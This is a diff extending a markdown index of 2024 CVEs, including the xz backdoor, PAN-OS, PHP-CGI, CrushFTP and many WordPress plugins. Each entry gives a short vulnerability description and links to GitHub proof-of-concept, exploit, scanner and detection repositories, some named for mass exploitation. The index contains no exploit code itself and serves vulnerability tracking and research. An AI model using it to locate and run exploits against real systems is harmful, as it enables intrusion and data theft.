+- [felipecosta09/cve-2024-3094](https://github.com/felipecosta09/cve-2024-3094)
+- [weltregie/liblzma-scan](https://github.com/weltregie/liblzma-scan)
+- [crfearnworks/ansible-CVE-2024-3094](https://github.com/crfearnworks/ansible-CVE-2024-3094)
+- [robertdebock/ansible-playbook-cve-2024-3094](https://github.com/robertdebock/ansible-playbook-cve-2024-3094)
+- [badsectorlabs/ludus_xz_backdoor](https://github.com/badsectorlabs/ludus_xz_backdoor)
+- [Juul/xz-backdoor-scan](https://github.com/Juul/xz-backdoor-scan)
+- [fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-](https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-)
+- [neuralinhibitor/xzwhy](https://github.com/neuralinhibitor/xzwhy)
+- [shefirot/CVE-2024-3094](https://github.com/shefirot/CVE-2024-3094)
+
+### CVE-2024-3116 (2024-04-04)
+
+pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE) vulnerability through the validate binary path API. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to the database management system's integrity and the security of the underlying data.\n
+
+
+- [TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4](https://github.com/TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4)
+
+### CVE-2024-3154 (2024-04-26)
+
+A flaw was found in cri-o, where an arbitrary systemd property can be injected via a Pod annotation. Any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.
+
+
+- [cdxiaodong/CVE-2024-3154-communication](https://github.com/cdxiaodong/CVE-2024-3154-communication)
+
+### CVE-2024-3217 (2024-04-05)
+
+The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'attribute_value' and 'attribute_id' parameters in all versions up to, and including, 1.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [BassamAssiri/CVE-2024-3217-POC](https://github.com/BassamAssiri/CVE-2024-3217-POC)
+
+### CVE-2024-3272 (2024-04-04)
+
+Eine Schwachstelle wurde in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L bis 20240403 entdeckt. Sie wurde als sehr kritisch eingestuft. Betroffen davon ist ein unbekannter Prozess der Datei /cgi-bin/nas_sharing.cgi der Komponente HTTP GET Request Handler. Mit der Manipulation des Arguments user mit der Eingabe messagebus mit unbekannten Daten kann eine hard-coded credentials-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [nickswink/D-Link-NAS-Devices-Unauthenticated-RCE](https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE)
+- [aliask/dinkleberry](https://github.com/aliask/dinkleberry)
+
+### CVE-2024-3273 (2024-04-04)
+
+Es wurde eine Schwachstelle in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L bis 20240403 gefunden. Sie wurde als kritisch eingestuft. Betroffen hiervon ist ein unbekannter Ablauf der Datei /cgi-bin/nas_sharing.cgi der Komponente HTTP GET Request Handler. Durch die Manipulation des Arguments system mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [Chocapikk/CVE-2024-3273](https://github.com/Chocapikk/CVE-2024-3273)
+- [adhikara13/CVE-2024-3273](https://github.com/adhikara13/CVE-2024-3273)
+- [yarienkiva/honeypot-dlink-CVE-2024-3273](https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273)
+- [K3ysTr0K3R/CVE-2024-3273-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-3273-EXPLOIT)
+- [ThatNotEasy/CVE-2024-3273](https://github.com/ThatNotEasy/CVE-2024-3273)
+- [LeopoldSkell/CVE-2024-3273](https://github.com/LeopoldSkell/CVE-2024-3273)
+- [mrrobot0o/CVE-2024-3273-](https://github.com/mrrobot0o/CVE-2024-3273-)
+- [OIivr/Turvan6rkus-CVE-2024-3273](https://github.com/OIivr/Turvan6rkus-CVE-2024-3273)
+
+### CVE-2024-3293 (2024-04-23)
+
+The rtMedia for WordPress, BuddyPress and bbPress plugin for WordPress is vulnerable to blind SQL Injection via the rtmedia_gallery shortcode in all versions up to, and including, 4.6.18 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [truonghuuphuc/CVE-2024-3293-Poc](https://github.com/truonghuuphuc/CVE-2024-3293-Poc)
+
+### CVE-2024-3400 (2024-04-12)
+
+A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.\n\nCloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
+
+
+- [Yuvvi01/CVE-2024-3400](https://github.com/Yuvvi01/CVE-2024-3400)
+- [CerTusHack/CVE-2024-3400-PoC](https://github.com/CerTusHack/CVE-2024-3400-PoC)
+- [0x0d3ad/CVE-2024-3400](https://github.com/0x0d3ad/CVE-2024-3400)
+- [FoxyProxys/CVE-2024-3400](https://github.com/FoxyProxys/CVE-2024-3400)
+- [momika233/CVE-2024-3400](https://github.com/momika233/CVE-2024-3400)
+- [MrR0b0t19/CVE-2024-3400](https://github.com/MrR0b0t19/CVE-2024-3400)
+- [MurrayR0123/CVE-2024-3400-Compromise-Checker](https://github.com/MurrayR0123/CVE-2024-3400-Compromise-Checker)
+- [AdaniKamal/CVE-2024-3400](https://github.com/AdaniKamal/CVE-2024-3400)
+- [LoanVitor/CVE-2024-3400-](https://github.com/LoanVitor/CVE-2024-3400-)
+- [h4x0r-dz/CVE-2024-3400](https://github.com/h4x0r-dz/CVE-2024-3400)
+- [W01fh4cker/CVE-2024-3400-RCE-Scan](https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan)
+- [CONDITIONBLACK/CVE-2024-3400-POC](https://github.com/CONDITIONBLACK/CVE-2024-3400-POC)
+- [Chocapikk/CVE-2024-3400](https://github.com/Chocapikk/CVE-2024-3400)
+- [ihebski/CVE-2024-3400](https://github.com/ihebski/CVE-2024-3400)
+- [index2014/CVE-2024-3400-Checker](https://github.com/index2014/CVE-2024-3400-Checker)
+- [ZephrFish/CVE-2024-3400-Canary](https://github.com/ZephrFish/CVE-2024-3400-Canary)
+- [ak1t4/CVE-2024-3400](https://github.com/ak1t4/CVE-2024-3400)
+- [phantomradar/cve-2024-3400-poc](https://github.com/phantomradar/cve-2024-3400-poc)
+- [retkoussa/CVE-2024-3400](https://github.com/retkoussa/CVE-2024-3400)
+- [schooldropout1337/CVE-2024-3400](https://github.com/schooldropout1337/CVE-2024-3400)
+- [hahasagined/CVE-2024-3400](https://github.com/hahasagined/CVE-2024-3400)
+- [codeblueprint/CVE-2024-3400](https://github.com/codeblueprint/CVE-2024-3400)
+- [swaybs/CVE-2024-3400](https://github.com/swaybs/CVE-2024-3400)
+- [sxyrxyy/CVE-2024-3400-Check](https://github.com/sxyrxyy/CVE-2024-3400-Check)
+- [Ravaan21/CVE-2024-3400](https://github.com/Ravaan21/CVE-2024-3400)
+- [pwnj0hn/CVE-2024-3400](https://github.com/pwnj0hn/CVE-2024-3400)
+- [HackingLZ/panrapidcheck](https://github.com/HackingLZ/panrapidcheck)
+- [Kr0ff/cve-2024-3400](https://github.com/Kr0ff/cve-2024-3400)
+- [zam89/CVE-2024-3400-pot](https://github.com/zam89/CVE-2024-3400-pot)
+- [terminalJunki3/CVE-2024-3400-Checker](https://github.com/terminalJunki3/CVE-2024-3400-Checker)
+- [0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection](https://github.com/0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection)
+- [marconesler/CVE-2024-3400](https://github.com/marconesler/CVE-2024-3400)
+- [andrelia-hacks/CVE-2024-3400](https://github.com/andrelia-hacks/CVE-2024-3400)
+- [tk-sawada/IPLineFinder](https://github.com/tk-sawada/IPLineFinder)
+- [iwallarm/cve-2024-3400](https://github.com/iwallarm/cve-2024-3400)
+
+### CVE-2024-3435 (2024-05-16)
+
+A path traversal vulnerability exists in the 'save_settings' endpoint of the parisneo/lollms-webui application, affecting versions up to the latest release before 9.5. The vulnerability arises due to insufficient sanitization of the 'config' parameter in the 'apply_settings' function, allowing an attacker to manipulate the application's configuration by sending specially crafted JSON payloads. This could lead to remote code execution (RCE) by bypassing existing patches designed to mitigate such vulnerabilities.
+
+
+- [ymuraki-csc/cve-2024-3435](https://github.com/ymuraki-csc/cve-2024-3435)
+
+### CVE-2024-3495 (2024-05-22)
+
+The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [truonghuuphuc/CVE-2024-3495-Poc](https://github.com/truonghuuphuc/CVE-2024-3495-Poc)
+- [zomasec/CVE-2024-3495-POC](https://github.com/zomasec/CVE-2024-3495-POC)
+
+### CVE-2024-3552 (2024-06-13)
+
+The Web Directory Free WordPress plugin before 1.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.
+
+
+- [truonghuuphuc/CVE-2024-3552-Poc](https://github.com/truonghuuphuc/CVE-2024-3552-Poc)
+
+### CVE-2024-3806 (2024-05-09)
+
+The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via the 'porto_ajax_posts' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.
+
+
+- [truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc](https://github.com/truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc)
+
+### CVE-2024-3867 (2024-04-16)
+
+The archive-tainacan-collection theme for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in version 2.7.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+
+
+- [c4cnm/CVE-2024-3867](https://github.com/c4cnm/CVE-2024-3867)
+
+### CVE-2024-3922 (2024-06-13)
+
+The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [truonghuuphuc/CVE-2024-3922-Poc](https://github.com/truonghuuphuc/CVE-2024-3922-Poc)
+
+### CVE-2024-4040 (2024-04-22)
+
+A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.\n
+
+
+- [airbus-cert/CVE-2024-4040](https://github.com/airbus-cert/CVE-2024-4040)
+- [tucommenceapousser/CVE-2024-4040-Scanner](https://github.com/tucommenceapousser/CVE-2024-4040-Scanner)
+- [rbih-boulanouar/CVE-2024-4040](https://github.com/rbih-boulanouar/CVE-2024-4040)
+- [Mufti22/CVE-2024-4040](https://github.com/Mufti22/CVE-2024-4040)
+- [Stuub/CVE-2024-4040-SSTI-LFI-PoC](https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC)
+- [Praison001/CVE-2024-4040-CrushFTP-server](https://github.com/Praison001/CVE-2024-4040-CrushFTP-server)
+- [Mohammaddvd/CVE-2024-4040](https://github.com/Mohammaddvd/CVE-2024-4040)
+- [jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability](https://github.com/jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability)
+- [gotr00t0day/CVE-2024-4040](https://github.com/gotr00t0day/CVE-2024-4040)
+- [1ncendium/CVE-2024-4040](https://github.com/1ncendium/CVE-2024-4040)
+
+### CVE-2024-4231 (2024-05-10)
+
+This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to presence of root terminal access on a serial interface without proper access control. An attacker with physical access could exploit this by identifying UART pins and accessing the root shell on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to access the sensitive information on the targeted system.
+
+
+- [Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231)
+
+### CVE-2024-4232 (2024-05-10)
+
+This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to lack of encryption or hashing in storing of passwords within the router's firmware/ database. An attacker with physical access could exploit this by extracting the firmware and reverse engineer the binary data to access the plaintext passwords on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the targeted system.
+
+
+- [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232)
+
+### CVE-2024-4295 (2024-06-05)
+
+The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to SQL Injection via the ‘hash’ parameter in all versions up to, and including, 5.7.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [truonghuuphuc/CVE-2024-4295-Poc](https://github.com/truonghuuphuc/CVE-2024-4295-Poc)
+- [cve-2024/CVE-2024-4295-Poc](https://github.com/cve-2024/CVE-2024-4295-Poc)
+
+### CVE-2024-4323 (2024-05-20)
+
+A memory corruption vulnerability in Fluent Bit versions 2.0.7 thru 3.0.3. This issue lies in the embedded http server’s parsing of trace requests and may result in denial of service conditions, information disclosure, or remote code execution.
+
+
+- [skilfoy/CVE-2024-4323-Exploit-POC](https://github.com/skilfoy/CVE-2024-4323-Exploit-POC)
+- [d0rb/CVE-2024-4323](https://github.com/d0rb/CVE-2024-4323)
+- [yuansec/CVE-2024-4323-dos_poc](https://github.com/yuansec/CVE-2024-4323-dos_poc)
+
+### CVE-2024-4352 (2024-05-16)
+
+The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'get_calendar_materials' function. The plugin is also vulnerable to SQL Injection via the ‘year’ parameter of that function due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [truonghuuphuc/CVE-2024-4352-Poc](https://github.com/truonghuuphuc/CVE-2024-4352-Poc)
+
+### CVE-2024-4358 (2024-05-29)
+
+In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
+
+
+- [sinsinology/CVE-2024-4358](https://github.com/sinsinology/CVE-2024-4358)
+- [RevoltSecurities/CVE-2024-4358](https://github.com/RevoltSecurities/CVE-2024-4358)
+- [Harydhk7/CVE-2024-4358](https://github.com/Harydhk7/CVE-2024-4358)
+- [Sk1dr0wz/CVE-2024-4358_Mass_Exploit](https://github.com/Sk1dr0wz/CVE-2024-4358_Mass_Exploit)
+- [verylazytech/CVE-2024-4358](https://github.com/verylazytech/CVE-2024-4358)
+
+### CVE-2024-4367 (2024-05-14)
+
+A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.
+
+
+- [LOURC0D3/CVE-2024-4367-PoC](https://github.com/LOURC0D3/CVE-2024-4367-PoC)
+- [s4vvysec/CVE-2024-4367-POC](https://github.com/s4vvysec/CVE-2024-4367-POC)
+- [spaceraccoon/detect-cve-2024-4367](https://github.com/spaceraccoon/detect-cve-2024-4367)
+- [clarkio/pdfjs-vuln-demo](https://github.com/clarkio/pdfjs-vuln-demo)
+- [avalahEE/pdfjs_disable_eval](https://github.com/avalahEE/pdfjs_disable_eval)
+- [Zombie-Kaiser/cve-2024-4367-PoC-fixed](https://github.com/Zombie-Kaiser/cve-2024-4367-PoC-fixed)
+- [snyk-labs/pdfjs-vuln-demo](https://github.com/snyk-labs/pdfjs-vuln-demo)
+- [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo)
+- [Scivous/CVE-2024-4367-npm](https://github.com/Scivous/CVE-2024-4367-npm)
+
+### CVE-2024-4439 (2024-05-03)
+
+WordPress Core is vulnerable to Stored Cross-Site Scripting via user display names in the Avatar block in various versions up to 6.5.2 due to insufficient output escaping on the display name. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. In addition, it also makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that have the comment block present and display the comment author's avatar.
+
+
+- [MielPopsssssss/CVE-2024-4439](https://github.com/MielPopsssssss/CVE-2024-4439)
+- [d0rb/CVE-2024-4439](https://github.com/d0rb/CVE-2024-4439)
+- [xssor-dz/-CVE-2024-4439](https://github.com/xssor-dz/-CVE-2024-4439)
+
+### CVE-2024-4443 (2024-05-22)
+
+The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [truonghuuphuc/CVE-2024-4443-Poc](https://github.com/truonghuuphuc/CVE-2024-4443-Poc)
+
+### CVE-2024-4484 (2024-05-24)
+
+The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘xai_username’ parameter in versions up to, and including, 5.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+
+
+- [Abo5/CVE-2024-4484](https://github.com/Abo5/CVE-2024-4484)
+
+### CVE-2024-4577 (2024-06-09)
+
+In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
+
+
+- [TAM-K592/CVE-2024-4577](https://github.com/TAM-K592/CVE-2024-4577)
+- [ohhhh693/CVE-2024-4577](https://github.com/ohhhh693/CVE-2024-4577)
+- [Junp0/CVE-2024-4577](https://github.com/Junp0/CVE-2024-4577)
+- [princew88/CVE-2024-4577](https://github.com/princew88/CVE-2024-4577)
+- [11whoami99/CVE-2024-4577](https://github.com/11whoami99/CVE-2024-4577)
+- [watchtowrlabs/CVE-2024-4577](https://github.com/watchtowrlabs/CVE-2024-4577)
+- [zjhzjhhh/CVE-2024-4577](https://github.com/zjhzjhhh/CVE-2024-4577)
+- [huseyinstif/CVE-2024-4577-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template)
+- [taida957789/CVE-2024-4577](https://github.com/taida957789/CVE-2024-4577)
+- [Wh02m1/CVE-2024-4577](https://github.com/Wh02m1/CVE-2024-4577)
+- [Sysc4ll3r/CVE-2024-4577](https://github.com/Sysc4ll3r/CVE-2024-4577)
+- [WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP](https://github.com/WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP)
+- [Yukiioz/CVE-2024-4577](https://github.com/Yukiioz/CVE-2024-4577)
+- [0x20c/CVE-2024-4577-nuclei](https://github.com/0x20c/CVE-2024-4577-nuclei)
+- [manuelinfosec/CVE-2024-4577](https://github.com/manuelinfosec/CVE-2024-4577)
+- [zomasec/CVE-2024-4577](https://github.com/zomasec/CVE-2024-4577)
+- [ZephrFish/CVE-2024-4577-PHP-RCE](https://github.com/ZephrFish/CVE-2024-4577-PHP-RCE)
+- [xcanwin/CVE-2024-4577-PHP-RCE](https://github.com/xcanwin/CVE-2024-4577-PHP-RCE)
+- [dbyMelina/CVE-2024-4577](https://github.com/dbyMelina/CVE-2024-4577)
+- [Chocapikk/CVE-2024-4577](https://github.com/Chocapikk/CVE-2024-4577)
+- [K3ysTr0K3R/CVE-2024-4577-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-4577-EXPLOIT)
+- [it-t4mpan/check_cve_2024_4577.sh](https://github.com/it-t4mpan/check_cve_2024_4577.sh)
+- [bl4cksku11/CVE-2024-4577](https://github.com/bl4cksku11/CVE-2024-4577)
+- [nemu1k5ma/CVE-2024-4577](https://github.com/nemu1k5ma/CVE-2024-4577)
+- [aaddmin1122345/CVE-2024-4577-POC](https://github.com/aaddmin1122345/CVE-2024-4577-POC)
+- [d3ck4/Shodan-CVE-2024-4577](https://github.com/d3ck4/Shodan-CVE-2024-4577)
+- [Entropt/CVE-2024-4577_Analysis](https://github.com/Entropt/CVE-2024-4577_Analysis)
+- [XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE](https://github.com/XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE)
+- [hexedbyte/cve-2024-4577](https://github.com/hexedbyte/cve-2024-4577)
+- [Sh0ckFR/CVE-2024-4577](https://github.com/Sh0ckFR/CVE-2024-4577)
+- [gotr00t0day/CVE-2024-4577](https://github.com/gotr00t0day/CVE-2024-4577)
+- [sug4r-wr41th/CVE-2024-4577](https://github.com/sug4r-wr41th/CVE-2024-4577)
+- [AlperenY-cs/CVE-2024-4577](https://github.com/AlperenY-cs/CVE-2024-4577)
+- [VictorShem/CVE-2024-4577](https://github.com/VictorShem/CVE-2024-4577)
+- [jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE](https://github.com/jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE)
+- [amandineVdw/CVE-2024-4577](https://github.com/amandineVdw/CVE-2024-4577)
+- [PhinehasNarh/CVE-2024-4577-Defend](https://github.com/PhinehasNarh/CVE-2024-4577-Defend)
+
+### CVE-2024-4701 (2024-05-10)
+
+A path traversal issue potentially leading to remote code execution in Genie for all versions prior to 4.3.18
+
+
+- [JoeBeeton/CVE-2024-4701-POC](https://github.com/JoeBeeton/CVE-2024-4701-POC)
+
+### CVE-2024-4761 (2024-05-14)
+
+Out of bounds write in V8 in Google Chrome prior to 124.0.6367.207 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)
+
+
+- [michredteam/CVE-2024-4761](https://github.com/michredteam/CVE-2024-4761)
+
+### CVE-2024-4875 (2024-05-21)
+
+The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to unauthorized modification of data|loss of data due to a missing capability check on the 'ajax_dismiss' function in versions up to, and including, 2.5.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update options such as users_can_register, which can lead to unauthorized user registration.
+
+
+- [RandomRobbieBF/CVE-2024-4875](https://github.com/RandomRobbieBF/CVE-2024-4875)
+
+### CVE-2024-4898 (2024-06-12)
+
+The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary option updates due to a missing authorization checks on the REST API calls in all versions up to, and including, 0.1.0.38. This makes it possible for unauthenticated attackers to connect the site to InstaWP API, edit arbitrary site options and create administrator accounts.
+
+
+- [truonghuuphuc/CVE-2024-4898-Poc](https://github.com/truonghuuphuc/CVE-2024-4898-Poc)
+- [cve-2024/CVE-2024-4898-Poc](https://github.com/cve-2024/CVE-2024-4898-Poc)
+
+### CVE-2024-4956 (2024-05-16)
+
+Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
+
+
+- [banditzCyber0x/CVE-2024-4956](https://github.com/banditzCyber0x/CVE-2024-4956)
+- [xungzzz/CVE-2024-4956](https://github.com/xungzzz/CVE-2024-4956)
+- [erickfernandox/CVE-2024-4956](https://github.com/erickfernandox/CVE-2024-4956)
+- [gmh5225/CVE-2024-4956](https://github.com/gmh5225/CVE-2024-4956)
+- [ifconfig-me/CVE-2024-4956-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner)
+- [thinhap/CVE-2024-4956-PoC](https://github.com/thinhap/CVE-2024-4956-PoC)
+- [eoslvs/CVE-2024-4956](https://github.com/eoslvs/CVE-2024-4956)
+- [GoatSecurity/CVE-2024-4956](https://github.com/GoatSecurity/CVE-2024-4956)
+- [TypicalModMaker/CVE-2024-4956](https://github.com/TypicalModMaker/CVE-2024-4956)
+- [Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager](https://github.com/Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager)
+- [Cappricio-Securities/CVE-2024-4956](https://github.com/Cappricio-Securities/CVE-2024-4956)
+- [fin3ss3g0d/CVE-2024-4956](https://github.com/fin3ss3g0d/CVE-2024-4956)
+- [verylazytech/CVE-2024-4956](https://github.com/verylazytech/CVE-2024-4956)
+
+### CVE-2024-5084 (2024-05-23)
+
+The Hash Form – Drag & Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
+
+
+- [KTN1990/CVE-2024-5084](https://github.com/KTN1990/CVE-2024-5084)
+- [Chocapikk/CVE-2024-5084](https://github.com/Chocapikk/CVE-2024-5084)
+- [k3lpi3b4nsh33/CVE-2024-5084](https://github.com/k3lpi3b4nsh33/CVE-2024-5084)
+
+### CVE-2024-5326 (2024-05-30)
+
+The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'postx_presets_callback' function in all versions up to, and including, 4.1.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.
+
+
+- [truonghuuphuc/CVE-2024-5326-Poc](https://github.com/truonghuuphuc/CVE-2024-5326-Poc)
+- [cve-2024/CVE-2024-5326-Poc](https://github.com/cve-2024/CVE-2024-5326-Poc)
+
+### CVE-2024-5522 (2024-06-20)
+
+The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
+
+
+- [truonghuuphuc/CVE-2024-5522-Poc](https://github.com/truonghuuphuc/CVE-2024-5522-Poc)
+
+### CVE-2024-5806 (2024-06-25)
+
+Improper Authentication vulnerability in Progress MOVEit Transfer (SFTP module) can lead to Authentication Bypass.This issue affects MOVEit Transfer: from 2023.0.0 before 2023.0.11, from 2023.1.0 before 2023.1.6, from 2024.0.0 before 2024.0.2.
+
+
+- [watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806](https://github.com/watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806)
+
+### CVE-2024-6028 (2024-06-25)
+
+The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [truonghuuphuc/CVE-2024-6028-Poc](https://github.com/truonghuuphuc/CVE-2024-6028-Poc)
+
+### CVE-2024-12883
+- [mhtsec/cve-2024-12883](https://github.com/mhtsec/cve-2024-12883)
+
+### CVE-2024-20291 (2024-02-28)
+
+A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device.\r\n\r This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces.
+
+
+- [Instructor-Team8/CVE-2024-20291-POC](https://github.com/Instructor-Team8/CVE-2024-20291-POC)
+
+### CVE-2024-20338 (2024-03-06)
+
+A vulnerability in the ISE Posture (System Scan) module of Cisco Secure Client for Linux could allow an authenticated, local attacker to elevate privileges on an affected device.\r\n\r This vulnerability is due to the use of an uncontrolled search path element. An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process. A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges.
+
+
+- [annmuor/CVE-2024-20338](https://github.com/annmuor/CVE-2024-20338)
+
+### CVE-2024-20356 (2024-04-24)
+
